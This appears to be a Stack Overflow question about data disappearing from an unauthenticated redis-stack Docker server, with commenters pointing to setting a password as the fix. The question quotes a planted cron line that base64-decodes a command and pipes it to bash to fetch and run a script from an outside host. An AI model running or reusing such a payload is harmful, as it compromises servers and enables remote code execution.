# Data stored in Redis-stack server (docker image) gets deleted automatically and backup keys are getting created

Tags: database, docker, docker-compose, redis, redis-stack-server

For one of my applications, I am using redis-stack server docker image to store data.

I am storing data in the form of hash table, for which I have created a unique index using FT.CREATE command.

I am running a cronjob(in node-js) to append the data regularly redis-server. The data is getting stored perfectly fine, but after few moments (roughly after 2 minutes), all the stored data gets deleted and 4 backup keys are getting created. (eg: backup1, backup2)
Content of the backup keys are somewhat similar to this:

```
"\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash \n\n"
```

I have tried to disable redis-persistence in redis-cli, using following commands

1. config set appendonly no
2. config set save ""

Note: I have increased redis db memory size also.

I tried to implement available solutions, still no luck. I need to get my key-value data as is for my application, instead of recovering any backup file created.

Any help is greatly appreciated.
Thanks in advance

Comment: Yes. You just need to secure your redis-stack database, by setting password in redis.config file/ by requirepass command and authenticating it from your application.

Comment: Yes, I did the same and it worked! Found the answer from another question thread.

Comment: @SirojiddinKomolov can you please provide us with the question link?